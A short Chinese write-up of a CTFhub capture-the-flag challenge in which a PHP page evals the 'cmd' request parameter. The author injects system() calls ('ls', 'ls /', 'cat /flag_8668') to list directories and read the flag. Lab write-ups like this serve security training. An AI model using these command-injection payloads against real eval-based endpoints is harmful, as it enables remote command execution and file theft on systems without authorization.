CTFhub-RCE-evel执行

携柺星年2023-11-13 11:42

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
我要添砖java9 分钟前
《JAVAEE》网络编程-什么是网络?
java·网络·java-ee
孜燃10 分钟前
Flutter APP跳转Flutter APP 携带参数
前端·flutter
CoderYanger12 分钟前
动态规划算法-01背包问题:50.分割等和子集
java·算法·leetcode·动态规划·1024程序员节
脾气有点小暴23 分钟前
前端页面跳转的核心区别与实战指南
开发语言·前端·javascript
lxh011329 分钟前
最长递增子序列
前端·数据结构·算法
Youyzq1 小时前
前端项目发布到cdn上css被编译失效问题rgba失效和rgb失效
前端·css·算法·cdn
Fantastic_sj2 小时前
Vue3相比Vue2的改进之处
前端·javascript·vue.js
菜鸟233号2 小时前
力扣513 找树左下角的值 java实现
java·数据结构·算法·leetcode
vipbic2 小时前
解决npm publish的404/403和配置警告全记录
前端·npm·node.js
Bigger2 小时前
🚀 “踩坑日记”:shadcn + Vite 在 Monorepo 中配置报错
前端·react.js·vite
热门推荐
01GitHub 镜像站点02【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)03UV安装并设置国内源04【AutoGLM部署】本地私有化部署AI手机Agent05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Linux下V2Ray安装配置指南07BongoCat - 跨平台键盘猫动画工具08React CVE-2025-55182漏洞排查与修复指南09Open-AutoGLM Windows 安装部署教程10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)